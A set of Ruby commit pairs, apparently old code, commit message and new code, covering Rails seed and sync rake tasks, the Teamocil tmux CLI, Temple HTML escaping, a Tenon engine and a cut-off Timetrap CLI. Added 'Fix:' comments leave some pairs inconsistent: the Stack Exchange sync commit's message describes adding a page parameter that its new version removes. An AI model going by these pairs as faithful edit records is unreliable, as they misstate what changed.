{ :name => "Isabella", :gender => "female", :longest_distance => 13.1, :mile_time => 470_000 },
{ :name => "Noah", :gender => "male", :longest_distance => 26.2, :mile_time => 500_000 },
{ :name => "Olivia", :gender => "female", :longest_distance => 26.2, :mile_time => 510_000 },
{ :name => "William", :gender => "male", :longest_distance => 50, :mile_time => 600_000 },
{ :name => "Ava", :gender => "female", :longest_distance => 50, :mile_time => 640_000 },
{ :name => "Liam", :gender => "male", :longest_distance => 1, :mile_time => 720_000 },
{ :name => "Emily", :gender => "female", :longest_distance => 1, :mile_time => 760_000 },
{ :name => "Jayden", :gender => "male", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Abigail", :gender => "female", :longest_distance => 0.2, :mile_time => 1_200_000 },
{ :name => "Michael", :gender => "male", :longest_distance => 3.9, :mile_time => 460_000 },
{ :name => "Mia", :gender => "female", :longest_distance => 4.3, :mile_time => 490_000 },
{ :name => "Alexander", :gender => "male", :longest_distance => 5.3, :mile_time => 430_000 },
{ :name => "Madison", :gender => "female", :longest_distance => 4.8, :mile_time => 450_000 },
{ :name => "Aiden", :gender => "male", :longest_distance => 18.8, :mile_time => 400_000 },
{ :name => "Elizabeth", :gender => "female", :longest_distance => 16.4, :mile_time => 415_000 }
]
# NOTE(review): User.create (not create!) silently skips invalid records.
users.each do |user|
User.create user
end
end
end
Add more seed data
namespace :seed do
task all: ["exercises", "users"]
desc 'Seed Exercise'
task :exercises => :environment do
  exercises = [
    { :name => "Long Slow Run", :time => 60, :units => '["miles","minutes"]', :instructions => "Keep this run at a conversational pace. The strides should be run at 95% effort after the run with a full recovery between." },
    { :name => "Pull Ups", :time => 5, :units => '["reps"]', :instructions => "Stand below pull-up bar and grasp it with wide overhand grip. Hang on bar. Bend your knees and cross your lower legs. Pull your body up until your upper chest reaches the bar. Look up and keep chest up, leading toward the bar. Return with same speed. Keep the arms very slightly bent at the bottom of the motion to maintain the muscular activity. Simultaneously let your your shoulders be pulled up by the bodyweight. Repeat." },
    { :name => "Push Ups", :time => 5, :units => '["reps"]', :instructions => "Keeping body straight, lower body to floor by bending arms. Push body up until arms are extended. Repeat." },
    { :name => "Sit Ups", :time => 5, :units => '["reps"]', :instructions => "Have your knees bent and the balls of your feet and heels placed flat on the ground. Place your hands on opposing shoulders, so that your arms are crossed over your chest, or behind your head. This allows you a central rising point. Tighten your abdominal muscles gently by drawing in your belly button to your spine. Keeping your heels on the ground and your toes flat to the ground, slowly and gently lift your head first, followed by your shoulder blades. Focus your eyes on your bent knees, all the while gently contracting the abdominal muscles. Pull up from the floor until you're at a ninety-degree angle, or when the elbows are on, or past, the knees. Hold the position for a second. Slowly bring the torso back to the floor but try to keep it slightly elevated off the ground. This means not to place your back flat to the ground but to keep a slight, yet relaxed, arch." },
    { :name => "Squats", :time => 5, :units => '["reps"]', :instructions => "Stand with your head facing forward and your chest held up and out. Place your feet shoulder-width apart or slightly wider. Extend your hands straight out in front of you to help keep your balance. Sit back and down like you're sitting into an imaginary chair. Keep your head facing forward as your upper body bends forward a bit. Rather than allowing your back to round, let your lower back arch slightly as you descend. Lower down so your thighs are as parallel to the floor as possible, with your knees over your ankles. Press your weight back into your heels. Keep your body tight, and push through your heels to bring yourself back to the starting position." },
    { :name => "Long Slow Biking", :time => 60, :units => '["miles","minutes"]', :instructions => "Keep this trip at a conversational pace. The RPM should be at 95% effort after the trip with a full recovery between." },
    { :name => "Speed Biking", :time => 60 },
    { :name => "Indoor Cycling" },
    { :name => "Indoor Rowing" },
    { :name => "Swim" },
    { :name => "Pool Running" },
    { :name => "Ecliptical Machine Training" },
    { :name => "Hands-Up Lunge" },
    { :name => "Plank Flip" },
    { :name => "Single-Leg Squat" },
    { :name => "Swim workout" },
    { :name => "Core workout 1" },
    { :name => "Core Workout 2" },
    { :name => "16x400m" },
    { :name => "10x800" },
    { :name => "Overhead Lunge" },
    { :name => "Mixed-Grip Chinup" },
    { :name => "Scorpion" },
    { :name => "Sprints" }
  ]
  # Fix: the array was built and then discarded, so the task seeded nothing.
  # Persist the records the same way the sibling :users task does.
  exercises.each do |exercise|
    Exercise.create exercise
  end
end
desc 'Seed Users'
task :users => :environment do
  # Sample accounts covering a wide spread of distances and mile times.
  seed_users = [
    { name: "Jacob", gender: "male", longest_distance: 3.1, mile_time: 540_000 },
    { name: "Sophia", gender: "female", longest_distance: 3.1, mile_time: 570_000 },
    { name: "Mason", gender: "male", longest_distance: 5.2, mile_time: 360_000 },
    { name: "Emma", gender: "female", longest_distance: 5.2, mile_time: 390_000 },
    { name: "Ethan", gender: "male", longest_distance: 13.1, mile_time: 430_000 },
    { name: "Isabella", gender: "female", longest_distance: 13.1, mile_time: 470_000 },
    { name: "Noah", gender: "male", longest_distance: 26.2, mile_time: 500_000 },
    { name: "Olivia", gender: "female", longest_distance: 26.2, mile_time: 510_000 },
    { name: "William", gender: "male", longest_distance: 50, mile_time: 600_000 },
    { name: "Ava", gender: "female", longest_distance: 50, mile_time: 640_000 },
    { name: "Liam", gender: "male", longest_distance: 1, mile_time: 720_000 },
    { name: "Emily", gender: "female", longest_distance: 1, mile_time: 760_000 },
    { name: "Jayden", gender: "male", longest_distance: 0.2, mile_time: 1_200_000 },
    { name: "Abigail", gender: "female", longest_distance: 0.2, mile_time: 1_200_000 },
    { name: "Michael", gender: "male", longest_distance: 3.9, mile_time: 460_000 },
    { name: "Mia", gender: "female", longest_distance: 4.3, mile_time: 490_000 },
    { name: "Alexander", gender: "male", longest_distance: 5.3, mile_time: 430_000 },
    { name: "Madison", gender: "female", longest_distance: 4.8, mile_time: 450_000 },
    { name: "Aiden", gender: "male", longest_distance: 18.8, mile_time: 400_000 },
    { name: "Elizabeth", gender: "female", longest_distance: 16.4, mile_time: 415_000 }
  ]
  seed_users.each { |attrs| User.create attrs }
end
end
|
require 'httparty'

# Mirrors recent Stack Exchange questions into local Feed/Entry records.
namespace :sync do
  task feeds: [:environment] do
    # NOTE(review): Feed.where(...) returns a relation, not a single record,
    # yet save_questions calls feed.entries / feed.name on it — this probably
    # should be Feed.where(...).first. Confirm against the Feed model.
    philosophy_questions = grab_questions("artificial-intelligence","philosophy")
    save_questions(philosophy_questions, Feed.where(name: "Philosophy"))
    world_building_questions = grab_questions("artificial-intelligence", "worldbuilding")
    save_questions(world_building_questions, Feed.where(name: "Worldbuilding"))
    computer_science_questions = grab_questions("artificial-intelligence","cs")
    save_questions(computer_science_questions, Feed.where(name: "Computer Science"))
    theory_machine_learning_questions = grab_questions("machine-learning","stats")
    save_questions(theory_machine_learning_questions, Feed.where(name: "Cross Validated"))
    computional_linguistics_questions = grab_questions("computational-linguistics","linguistics")
    save_questions(computional_linguistics_questions, Feed.where(name: "Computional Linguistics"))
    machine_learning_questions = grab_questions("machine-learning","datascience")
    save_questions(machine_learning_questions, Feed.where(name: "Data Science"))
  end

  # Fetch one page of questions tagged +tag+ from the Stack Exchange site
  # +sitename+. +page+ is 1-based and defaults to the first page.
  # Fix: the original interpolated the undefined locals `page` and `site`
  # (the parameter is named `sitename`), raising NameError at runtime.
  def grab_questions(tag, sitename, page = 1)
    HTTParty.get("https://api.stackexchange.com/2.2/questions?page=#{page}&order=desc&sort=activity&tagged=#{tag}&site=#{sitename}")["items"]
  end

  # Upsert each API item into the feed's entries, keyed by title.
  def save_questions(entries, feed)
    entries.each do |entry|
      title = entry["title"]
      content = nil
      author = entry["owner"]["display_name"]
      author_profile = entry["owner"]["link"]
      url = entry["link"]
      published = Time.at(entry["creation_date"]).to_datetime
      local_entry = feed.entries.where(title: title).first_or_initialize
      local_entry.update_attributes(content: content, author: author, url: url, published: published, author_profile: author_profile)
      p "Synced Entry - #{title}"
    end
    p "Synced Feed - #{feed.name}"
  end
end
Indicate which page of results to fetch
require 'httparty'

# Mirrors recent Stack Exchange questions into local Feed/Entry records.
namespace :sync do
  task feeds: [:environment] do
    # NOTE(review): Feed.where(...) returns a relation, not a single record,
    # yet save_questions calls feed.entries / feed.name on it — this probably
    # should be Feed.where(...).first. Confirm against the Feed model.
    philosophy_questions = grab_questions("artificial-intelligence","philosophy")
    save_questions(philosophy_questions, Feed.where(name: "Philosophy"))
    world_building_questions = grab_questions("artificial-intelligence", "worldbuilding")
    save_questions(world_building_questions, Feed.where(name: "Worldbuilding"))
    computer_science_questions = grab_questions("artificial-intelligence","cs")
    save_questions(computer_science_questions, Feed.where(name: "Computer Science"))
    theory_machine_learning_questions = grab_questions("machine-learning","stats")
    save_questions(theory_machine_learning_questions, Feed.where(name: "Cross Validated"))
    computional_linguistics_questions = grab_questions("computational-linguistics","linguistics")
    save_questions(computional_linguistics_questions, Feed.where(name: "Computional Linguistics"))
    machine_learning_questions = grab_questions("machine-learning","datascience")
    save_questions(machine_learning_questions, Feed.where(name: "Data Science"))
  end

  # Fetch the first page of questions tagged +tag+ from the Stack Exchange
  # site +sitename+.
  # Fix: the original interpolated the undefined local `site` (the parameter
  # is named `sitename`), raising NameError at runtime.
  def grab_questions(tag, sitename)
    HTTParty.get("https://api.stackexchange.com/2.2/questions?page=1&order=desc&sort=activity&tagged=#{tag}&site=#{sitename}")["items"]
  end

  # Upsert each API item into the feed's entries, keyed by title.
  def save_questions(entries, feed)
    entries.each do |entry|
      title = entry["title"]
      content = nil
      author = entry["owner"]["display_name"]
      author_profile = entry["owner"]["link"]
      url = entry["link"]
      published = Time.at(entry["creation_date"]).to_datetime
      local_entry = feed.entries.where(title: title).first_or_initialize
      local_entry.update_attributes(content: content, author: author, url: url, published: published, author_profile: author_profile)
      p "Synced Entry - #{title}"
    end
    p "Synced Feed - #{feed.name}"
  end
end
namespace :temp do
  desc 'Update campaign slugs that end in a trailing hyphen'
  task :update_trailing_hyphen_slugs => :environment do
    # Re-saving a campaign regenerates its slug; only touch the ones whose
    # current slug ends in a trailing hyphen.
    Campaign.visible.each do |record|
      record.save if record.to_param.last == '-'
    end
  end
end
Temp task for franchise transfer.
namespace :temp do
  desc 'Update campaign slugs that end in a trailing hyphen'
  task :update_trailing_hyphen_slugs => :environment do
    # Re-saving a campaign regenerates its slug.
    Campaign.visible.each do |campaign|
      if campaign.to_param.last == '-'
        campaign.save
      end
    end
  end

  desc 'Transfer NXEA routes to Greater Anglia'
  task :transfer_nxea_routes_to_greater_anglia => :environment do
    operator = Operator.find_by_name('National Express East Anglia')
    new_operator = Operator.find_by_name('Greater Anglia')
    raise "Couldn't find NXEA" unless operator
    # Robustness: fail loudly if the target operator is missing too,
    # instead of raising NoMethodError mid-transfer.
    raise "Couldn't find Greater Anglia" unless new_operator
    operator.route_operators.each do |route_operator|
      route = route_operator.route
      # Fix: route links must be re-created as RouteOperator records; the
      # original created a StopAreaOperator with a :route attribute
      # (copy-paste from the stop-area loop below).
      RouteOperator.create!(:operator => new_operator, :route => route)
      puts route_operator.id
      route_operator.destroy
    end
    operator.stop_area_operators.each do |stop_area_operator|
      stop_area = stop_area_operator.stop_area
      StopAreaOperator.create!(:operator => new_operator, :stop_area => stop_area)
      puts stop_area_operator.id
      stop_area_operator.destroy
    end
  end
end
|
require 'optparse'
require 'fileutils'
module Teamocil
  # This class handles interaction with the `tmux` utility.
  class CLI
    attr_accessor :layout, :layouts

    # Initialize a new run of `tmux`
    #
    # @param argv [Array] the command line parameters (usually `ARGV`).
    # @param env [Hash] the environment variables hash (usually `ENV`).
    def initialize(argv, env) # {{{
      parse_options! argv
      layout_path = File.join("#{env["HOME"]}", ".teamocil")
      if @options.include?(:list)
        @layouts = get_layouts(layout_path)
        return print_layouts
      end
      if @options.include?(:layout)
        file = @options[:layout]
      else
        file = ::File.join(layout_path, "#{argv[0]}.yml")
      end
      if @options[:edit]
        # Fix: File.exist? — the File.exists? alias is deprecated and was
        # removed in Ruby 3.2.
        ::FileUtils.touch file unless File.exist?(file)
        Kernel.system("$EDITOR \"#{file}\"")
      else
        bail "There is no file \"#{file}\"" unless File.exist?(file)
        bail "You must be in a tmux session to use teamocil" unless env["TMUX"]
        parsed_layout = YAML.load_file(file)
        @layout = Teamocil::Layout.new(parsed_layout, @options)
        @layout.compile!
        @layout.execute_commands(@layout.generate_commands)
      end
    end # }}}

    # Parse the command line options into @options
    def parse_options!(args) # {{{
      @options = {}
      # Named `parser` to avoid shadowing the block parameter `opts`.
      parser = ::OptionParser.new do |opts|
        opts.banner = "Usage: teamocil [options] <layout>
Options:
"
        opts.on("--here", "Set up the first window in the current window") do
          @options[:here] = true
        end
        opts.on("--edit", "Edit the YAML layout file instead of using it") do
          @options[:edit] = true
        end
        opts.on("--layout [LAYOUT]", "Use a specific layout file, instead of `~/.teamocil/<layout>.yml`") do |layout|
          @options[:layout] = layout
        end
        opts.on("--list", "List all available layouts in `~/.teamocil/`") do
          @options[:list] = true
        end
      end
      parser.parse! args
    end # }}}

    # Return an array of available layout names (file basenames, sorted,
    # without extensions)
    #
    # @param path [String] the path used to look for layouts
    def get_layouts(path) # {{{
      Dir.glob(File.join(path, "*.yml")).map { |file| File.basename(file).gsub(/\..+$/, "") }.sort
    end # }}}

    # Print each layout on a single line
    def print_layouts # {{{
      STDOUT.puts @layouts.join("\n")
      exit 0
    end # }}}

    # Print an error message and exit the utility
    #
    # @param msg [Mixed] something to print before exiting.
    def bail(msg) # {{{
      STDERR.puts "[teamocil] #{msg}"
      exit 1
    end # }}}
  end
end
Clean some code in CLI class
require 'optparse'
require 'fileutils'
module Teamocil
  # This class handles interaction with the `tmux` utility.
  class CLI
    attr_accessor :layout, :layouts

    # Initialize a new run of `tmux`
    #
    # @param argv [Array] the command line parameters (usually `ARGV`).
    # @param env [Hash] the environment variables hash (usually `ENV`).
    def initialize(argv, env) # {{{
      parse_options! argv
      layout_path = File.join("#{env["HOME"]}", ".teamocil")
      if @options.include?(:list)
        @layouts = get_layouts(layout_path)
        return print_layouts
      end
      file = @options[:layout] || ::File.join(layout_path, "#{argv[0]}.yml")
      if @options[:edit]
        # Fix: File.exist? — the File.exists? alias is deprecated and was
        # removed in Ruby 3.2.
        ::FileUtils.touch file unless File.exist?(file)
        Kernel.system("$EDITOR \"#{file}\"")
      else
        bail "There is no file \"#{file}\"" unless File.exist?(file)
        bail "You must be in a tmux session to use teamocil" unless env["TMUX"]
        @layout = Teamocil::Layout.new(YAML.load_file(file), @options)
        @layout.compile!
        @layout.execute_commands(@layout.generate_commands)
      end
    end # }}}

    # Parse the command line options into @options
    def parse_options!(args) # {{{
      @options = {}
      # Named `parser` to avoid shadowing the block parameter `opts`.
      parser = ::OptionParser.new do |opts|
        opts.banner = "Usage: teamocil [options] <layout>
Options:
"
        opts.on("--here", "Set up the first window in the current window") do
          @options[:here] = true
        end
        opts.on("--edit", "Edit the YAML layout file instead of using it") do
          @options[:edit] = true
        end
        opts.on("--layout [LAYOUT]", "Use a specific layout file, instead of `~/.teamocil/<layout>.yml`") do |layout|
          @options[:layout] = layout
        end
        opts.on("--list", "List all available layouts in `~/.teamocil/`") do
          @options[:list] = true
        end
      end
      parser.parse! args
    end # }}}

    # Return an array of available layout names (file basenames, sorted,
    # without extensions)
    #
    # @param path [String] the path used to look for layouts
    def get_layouts(path) # {{{
      Dir.glob(File.join(path, "*.yml")).map { |file| File.basename(file).gsub(/\..+$/, "") }.sort
    end # }}}

    # Print each layout on a single line
    def print_layouts # {{{
      STDOUT.puts @layouts.join("\n")
      exit 0
    end # }}}

    # Print an error message and exit the utility
    #
    # @param msg [Mixed] something to print before exiting.
    def bail(msg) # {{{
      STDERR.puts "[teamocil] #{msg}"
      exit 1
    end # }}}
  end
end
|
module Temple
  # @api public
  module Utils
    extend self

    # Returns an escaped copy of `html`.
    # Strings which are declared as html_safe are not escaped.
    #
    # @param html [String] The string to escape
    # @return [String] The escaped string
    def escape_html_safe(html)
      html.html_safe? ? html : escape_html(html)
    end

    if defined?(EscapeUtils)
      # Returns an escaped copy of `html`.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        EscapeUtils.escape_html(html.to_s)
      end
    elsif RUBY_VERSION > '1.9'
      # Used by escape_html
      # Fix: the replacement values must be HTML entity references — mapping
      # each character to itself made escaping a no-op.
      # @api private
      ESCAPE_HTML = {
        '&' => '&amp;',
        '"' => '&quot;',
        '<' => '&lt;',
        '>' => '&gt;',
        '/' => '&#47;',
      }.freeze

      # Returns an escaped copy of `html`.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        html.to_s.gsub(/[&\"<>\/]/, ESCAPE_HTML)
      end
    else
      # Returns an escaped copy of `html`.
      # Pre-1.9 fallback: String#gsub has no hash-replacement support there.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        html.to_s.gsub(/&/n, '&amp;').gsub(/\"/n, '&quot;').gsub(/>/n, '&gt;').gsub(/</n, '&lt;').gsub(/\//, '&#47;')
      end
    end

    # Generate unique variable name
    #
    # @param prefix [String] Variable name prefix
    # @return [String] Variable name
    def unique_name(prefix = nil)
      @unique_name ||= 0
      prefix ||= (@unique_prefix ||= self.class.name.gsub('::', '_').downcase)
      "_#{prefix}#{@unique_name += 1}"
    end

    # Check if an expression contains a :static node anywhere
    # (recursing through :multi and :escape wrappers).
    #
    # @param exp [Array] Temple expression
    # @return true if static content is present
    def contains_static?(exp)
      case exp[0]
      when :multi
        exp[1..-1].any? {|e| contains_static?(e) }
      when :escape
        contains_static?(exp[2])
      when :static
        true
      else
        false
      end
    end

    # Check if expression is empty
    #
    # @param exp [Array] Temple expression
    # @return true if expression is empty
    def empty_exp?(exp)
      case exp[0]
      when :multi
        exp[1..-1].all? {|e| empty_exp?(e) }
      when :newline
        true
      else
        false
      end
    end
  end
end
Temple::Utils do not escape / in escape_html
module Temple
  # @api public
  module Utils
    extend self

    # Returns an escaped copy of `html`.
    # Strings which are declared as html_safe are not escaped.
    #
    # @param html [String] The string to escape
    # @return [String] The escaped string
    def escape_html_safe(html)
      html.html_safe? ? html : escape_html(html)
    end

    if defined?(EscapeUtils)
      # Returns an escaped copy of `html`.
      # The second argument disables slash escaping in EscapeUtils.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        EscapeUtils.escape_html(html.to_s, false)
      end
    elsif RUBY_VERSION > '1.9'
      # Used by escape_html
      # Fix: the replacement values must be HTML entity references — mapping
      # each character to itself made escaping a no-op. Note that '/' is
      # intentionally not escaped in this version.
      # @api private
      ESCAPE_HTML = {
        '&' => '&amp;',
        '"' => '&quot;',
        '<' => '&lt;',
        '>' => '&gt;',
      }.freeze

      # Returns an escaped copy of `html`.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        html.to_s.gsub(/[&\"<>]/, ESCAPE_HTML)
      end
    else
      # Returns an escaped copy of `html`.
      # Pre-1.9 fallback: String#gsub has no hash-replacement support there.
      #
      # @param html [String] The string to escape
      # @return [String] The escaped string
      def escape_html(html)
        html.to_s.gsub(/&/n, '&amp;').gsub(/\"/n, '&quot;').gsub(/>/n, '&gt;').gsub(/</n, '&lt;')
      end
    end

    # Generate unique variable name
    #
    # @param prefix [String] Variable name prefix
    # @return [String] Variable name
    def unique_name(prefix = nil)
      @unique_name ||= 0
      prefix ||= (@unique_prefix ||= self.class.name.gsub('::', '_').downcase)
      "_#{prefix}#{@unique_name += 1}"
    end

    # Check if an expression contains a :static node anywhere
    # (recursing through :multi and :escape wrappers).
    #
    # @param exp [Array] Temple expression
    # @return true if static content is present
    def contains_static?(exp)
      case exp[0]
      when :multi
        exp[1..-1].any? {|e| contains_static?(e) }
      when :escape
        contains_static?(exp[2])
      when :static
        true
      else
        false
      end
    end

    # Check if expression is empty
    #
    # @param exp [Array] Temple expression
    # @return true if expression is empty
    def empty_exp?(exp)
      case exp[0]
      when :multi
        exp[1..-1].all? {|e| empty_exp?(e) }
      when :newline
        true
      else
        false
      end
    end
  end
end
|
require 'browserify-rails'
require 'cancan'
require 'cocoon'
require 'coffee-rails'
require 'date_time_attribute'
require 'draper'
require 'dynamic_form'
require 'eco'
require 'font-awesome-rails'
require 'haml'
require 'jbuilder'
require 'jquery-fileupload-rails'
require 'jquery-rails'
require 'jquery-ui-rails'
require 'lodash-rails'
require 'mediaelement_rails'
require 'mime-types'
require 'neat'
require 'non-stupid-digest-assets'
require 'normalize-rails'
require 'paperclip'
require 'paperclip_processors/cropper'
require 'pickadate-rails'
require 'rails-settings-cached'
require 'react-rails'
require 'sass-rails'
require 'sprockets/es6'
require 'uuidtools'
require 'will_paginate'
module Tenon
# Rails engine entry point: wires Tenon's generators, controller helpers,
# and asset/browserify configuration into the host application.
class Engine < ::Rails::Engine
isolate_namespace Tenon
# Make Tenon's generator templates take priority over the defaults.
config.app_generators do |g|
g.templates.unshift File.expand_path('../../templates', __FILE__)
end
# Re-attach Tenon's helpers whenever the app code is (re)loaded.
config.to_prepare do
ApplicationController.helper(Tenon::TenonHelper)
ApplicationController.helper(Tenon::BreadcrumbsHelper)
end
initializer :assets do |config|
Rails.application.config.assets.precompile += ['tenon/tenon_manifest.js', 'tenon/tenon.scss', 'tenon/*.png']
# Browserify: transpile with babel, include JS that lives under this
# engine's app/ directory, and use browserify-incremental builds.
Rails.application.config.browserify_rails.commandline_options = '-t babelify'
Rails.application.config.browserify_rails.paths << lambda { |p| p.start_with?(Engine.root.join("app").to_s) }
Rails.application.config.browserify_rails.use_browserifyinc = true
end
end
end
working on cleaning up gems and getting it running on the demo server
require 'browserify-rails'
require 'cancan'
require 'cocoon'
require 'coffee-rails'
require 'date_time_attribute'
require 'draper'
require 'dynamic_form'
require 'eco'
require 'font-awesome-rails'
require 'haml'
require 'jbuilder'
require 'jquery-fileupload-rails'
require 'jquery-rails'
require 'jquery-ui-rails'
require 'lodash-rails'
require 'mediaelement_rails'
require 'mime-types'
require 'neat'
require 'non-stupid-digest-assets'
require 'normalize-rails'
require 'paperclip'
require 'paperclip_processors/cropper'
require 'pickadate-rails'
require 'rails-settings-cached'
require 'react-rails'
require 'sass-rails'
require 'sprockets/es6'
require 'uuidtools'
require 'will_paginate'
# Dummy app gems
require 'humanizer'
module Tenon
# Rails engine entry point: wires Tenon's generators, controller helpers,
# and asset/browserify configuration into the host application.
class Engine < ::Rails::Engine
isolate_namespace Tenon
# Make Tenon's generator templates take priority over the defaults.
config.app_generators do |g|
g.templates.unshift File.expand_path('../../templates', __FILE__)
end
# Re-attach Tenon's helpers whenever the app code is (re)loaded.
config.to_prepare do
ApplicationController.helper(Tenon::TenonHelper)
ApplicationController.helper(Tenon::BreadcrumbsHelper)
end
initializer :assets do |config|
Rails.application.config.assets.precompile += ['tenon/tenon_manifest.js', 'tenon/tenon.scss', 'tenon/*.png']
# Browserify: transpile with babel, include JS that lives under this
# engine's app/ directory, and use browserify-incremental builds.
Rails.application.config.browserify_rails.commandline_options = '-t babelify'
Rails.application.config.browserify_rails.paths << lambda { |p| p.start_with?(Engine.root.join("app").to_s) }
Rails.application.config.browserify_rails.use_browserifyinc = true
end
end
end
|
module Timetrap
module CLI
extend Helpers
attr_accessor :args
extend self
# Help text. Also the Getopt::Declare grammar: the indented option lines
# define the accepted flags, and the "* <name>" bullets are scanned by
# CLI#commands — only prose was edited here ("fomatter" typo, truncated
# sentence in the display description), never the option specs.
USAGE = <<-EOF
Timetrap - Simple Time Tracking
Usage: #{File.basename $0} COMMAND [OPTIONS] [ARGS...]
COMMAND can be abbreviated. For example `t in` and `t i` are equivalent.
COMMAND is one of:
* archive - Move entries to a hidden sheet (by default named '_[SHEET]') so
they're out of the way.
usage: t archive [--start DATE] [--end DATE] [SHEET]
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
* backend - Open an sqlite shell to the database.
usage: t backend
* configure - Write out a YAML config file. Print path to config file. The
file may contain ERB.
usage: t configure
Currently supported options are:
round_in_seconds: The duration of time to use for rounding with
the -r flag
database_file: The file path of the sqlite database
append_notes_delimiter: delimiter used when appending notes via
t edit --append
formatter_search_paths: an array of directories to search for user
defined formatter classes
default_formatter: The format to use when display is invoked without a
`--format` option
default_command: The default command to run when calling t.
auto_checkout: Automatically check out of running entries when
you check in or out
require_note: Prompt for a note if one isn't provided when
checking in
* display - Display the current timesheet or a specific sheet. Pass `all' as SHEET
to display all unarchived sheets or `full' to display archived and
unarchived sheets.
usage: t display [--ids] [--start DATE] [--end DATE] [--format FMT] [SHEET | all | full]
-v, --ids Print database ids (for use with edit)
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
-f, --format <format> The output format. Valid built-in formats are
ical, csv, json, ids, factor, and text (default).
Documentation on defining custom formats can be
found in the README included in this
distribution.
* edit - Alter an entry's note, start, or end time. Defaults to the active
entry. Defaults to the last entry to be checked out of if no entry is active.
usage: t edit [--id ID] [--start TIME] [--end TIME] [--append] [NOTES]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
-s, --start <time:qs> Change the start time to <time>
-e, --end <time:qs> Change the end time to <time>
-z, --append Append to the current note instead of replacing it
the delimiter between appended notes is
configurable (see configure)
-m, --move <sheet> Move to another sheet
* in - Start the timer for the current timesheet.
usage: t in [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* kill - Delete a timesheet or an entry.
usage: t kill [--id ID] [TIMESHEET]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
* list - Show the available timesheets.
usage: t list
* now - Show all running entries.
usage: t now
* out - Stop the timer for a timesheet.
usage: t out [--at TIME] [TIMESHEET]
-a, --at <time:qs> Use this time instead of now
* resume - Start the timer for the current time sheet with the same note as
the last entry on the sheet. If there is no entry it takes the passed note.
usage: t resume [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* sheet - Switch to a timesheet creating it if necessary. When no sheet is
specified list all sheets. The special sheetname '-' will switch to the
last active sheet.
usage: t sheet [TIMESHEET]
* today - Shortcut for display with start date as the current day
usage: t today [--ids] [--format FMT] [SHEET | all]
* yesterday - Shortcut for display with start and end dates as the day before the current day
usage: t yesterday [--ids] [--format FMT] [SHEET | all]
* week - Shortcut for display with start date set to monday of this week.
usage: t week [--ids] [--end DATE] [--format FMT] [SHEET | all]
* month - Shortcut for display with start date set to the beginning of either
this month or a specified month.
usage: t month [--ids] [--start MONTH] [--format FMT] [SHEET | all]
OTHER OPTIONS
-h, --help Display this help.
-r, --round Round output to 15 minute start and end times.
-y, --yes Noninteractive, assume yes as answer to all prompts.
--debug Display stack traces for errors.
EXAMPLES
# create the "MyTimesheet" timesheet
$ t sheet MyTimesheet
# check in 5 minutes ago with a note
$ t in --at '5 minutes ago' doing some stuff
# check out
$ t out
# view current timesheet
$ t display
Submit bugs and feature requests to http://github.com/samg/timetrap/issues
EOF
# Hand the raw command-line arguments to the Getopt::Declare spec in `args`.
def parse(arguments)
  args.parse(arguments)
end
# Entry point after parsing: print usage for -h, otherwise dispatch to the
# selected command. Errors are reported on stderr; --debug re-raises so the
# full stack trace is visible.
def invoke
args['-h'] ? puts(USAGE) : invoke_command_if_valid
rescue StandardError, LoadError => e
raise e if args['--debug']
warn e.message
# Under test the process must keep running, so only exit outside TEST_MODE.
exit 1 unless defined? TEST_MODE
end
# All valid command names, derived from the "* <name>" bullets in USAGE.
def commands
  Timetrap::CLI::USAGE.scan(/\* \w+/).map { |bullet| bullet.sub(/\A\* /, '') }
end
# Legacy command names mapped to their modern replacements.
def deprecated_commands
  { 'switch' => 'sheet', 'running' => 'now', 'format' => 'display' }
end
# Dispatch the first positional argument as a command. When none was given
# and a default_command is configured, re-parse using the default. Commands
# may be abbreviated: any prefix matching exactly one command runs it.
def invoke_command_if_valid
if args.unused.empty? && Timetrap::Config['default_command']
self.args = Getopt::Declare.new(USAGE.dup, Timetrap::Config['default_command'])
end
command = args.unused.shift
set_global_options
# Ambiguous, unknown, or missing commands fall through to the error handler.
case (valid = commands.select{|name| name =~ %r|^#{command}|}).size
when 1 then send valid[0]
else
handle_invalid_command(command)
end
end
# Whether +command+ is an exact (non-abbreviated) command name.
def valid_command(command)
  commands.include?(command)
end
# No command at all: show usage. A deprecated name (or prefix of one): warn
# and forward to the replacement command. Anything else: report it on stderr.
def handle_invalid_command(command)
if !command
puts USAGE
elsif mapping = deprecated_commands.detect{|(k,v)| k =~ %r|^#{command}|}
deprecated, current = *mapping
warn "The #{deprecated.inspect} command is deprecated in favor of #{current.inspect}. Sorry for the inconvenience."
send current
else
warn "Invalid command: #{command.inspect}"
end
end
# currently just sets whether output should be rounded to 15 min intervals
# (the -r/--round flag; per USAGE, the granularity is configurable via the
# round_in_seconds config option).
def set_global_options
Timetrap::Entry.round = true if args['-r']
end
# Move the selected entries onto a hidden "_<sheet>" sheet after user
# confirmation. Entries without an end time (still running) are skipped.
def archive
ee = selected_entries
if ask_user "Archive #{ee.count} entries? "
ee.all.each do |e|
next unless e.end
e.update :sheet => "_#{e.sheet}"
end
else
warn "archive aborted!"
end
end
# Write out (or refresh) the YAML config file and print its location.
def configure
Config.configure!
puts "Config file is at #{Config::PATH.inspect}"
end
# Alter an entry's start, end, sheet, or note. The target is, in order of
# preference: the entry named by -i, the running entry, or the last entry
# checked out of.
def edit
entry = case
when args['-i']
warn "Editing entry with id #{args['-i'].inspect}"
Entry[args['-i']]
when Timer.active_entry
warn "Editing running entry"
Timer.active_entry
when Timer.last_checkout
warn "Editing last entry you checked out of"
Timer.last_checkout
end
unless entry
warn "Can't find entry"
return
end
warn ""
# Only apply the fields that were actually supplied (non-blank).
entry.update :start => args['-s'] if args['-s'] =~ /.+/
entry.update :end => args['-e'] if args['-e'] =~ /.+/
# update sheet
if args['-m'] =~ /.+/
# Moving the running entry also switches the current sheet.
if entry == Timer.active_entry
Timer.current_sheet = args['-m']
end
entry.update :sheet => args['-m']
end
# update notes
if unused_args =~ /.+/
note = unused_args
